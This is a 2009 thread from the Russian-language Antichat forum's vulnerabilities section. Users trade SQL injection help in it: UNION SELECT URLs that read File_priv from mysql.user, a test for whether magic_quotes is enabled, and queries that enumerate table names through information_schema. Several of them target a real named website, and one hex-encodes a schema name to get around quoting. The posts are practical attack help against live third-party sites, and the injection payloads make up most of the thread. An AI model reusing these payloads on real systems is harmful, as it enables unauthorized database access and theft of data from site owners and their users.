ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #8711  
Старый 27.08.2009, 08:12
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

a kak uznat magic_qupte on ili off??

i kak uznat file_priv Y ili N ??
[I]
 

  #8712  
Старый 27.08.2009, 09:16
mr.gr33n
Banned
Регистрация: 06.07.2009
Сообщений: 74
Провел на форуме:
437317

Репутация: 209
Отправить сообщение для mr.gr33n с помощью ICQ
По умолчанию

Например:
http://google.com/news.php?id=0+union+select+1,File_priv,3+from+mysq l.user--

так мы узнаем File_priv
 

  #8713  
Старый 27.08.2009, 09:47
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

magic_quotes = off или On

http://google.com/news.php?id=0+union+select+1,'p',3+from+mysq l.user--

если результатом будет буква p тогда M_Q=off если же будет ошибка , тогда M_Q=on
 

  #8714  
Старый 27.08.2009, 10:59
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от HAXTA4OK  
magic_quotes = off или On

http://google.com/news.php?id=0+union+select+1,'p',3+from+mysq l.user--

если результатом будет буква p тогда M_Q=off если же будет ошибка , тогда M_Q=on
А если колонки не подобрал.....а если запрос не закрыл...(и ещё пару десятков вариантов)и вылезла ошибка..значит MQ=On? думай что пишешь.
 

  #8715  
Старый 27.08.2009, 12:02
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

ob etix funkciyax est statya ??
 

  #8716  
Старый 27.08.2009, 12:53
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

скажите есть ли виждет для оперы, с помощью которого можно перехватывать http пакеты и изменять их.
 

  #8717  
Старый 27.08.2009, 19:27
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

не могу найти принтабельный столбец, хотя вроде их всего 1 )

http://www.aawow.info/question2.php?id=-31+union+select+1--

хелп)
 

  #8718  
Старый 27.08.2009, 19:29
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от jecka3000  
не могу найти принтабельный столбец, хотя вроде их всего 1 )

http://www.aawow.info/question2.php?id=-31+union+select+1--

хелп)
http://www.aawow.info/question2.php?id=-31+union+select+version()

В тайтле смотри 5.0.81-community-log
 

  #8719  
Старый 27.08.2009, 19:41
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

пытаюсь названия таблиц вывести таким запросом: http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema .tables+where+table_schema=%27aawowinf_wow%27

в ответ - ошибка.....
 

  #8720  
Старый 27.08.2009, 19:44
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.aawow.info/question2.php?id=-31+union+select+table_name+from+information_schema .tables+where+table_schema=0x6161776f77696e665f776 f77

Может стоит немного почитать статьи ? (
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ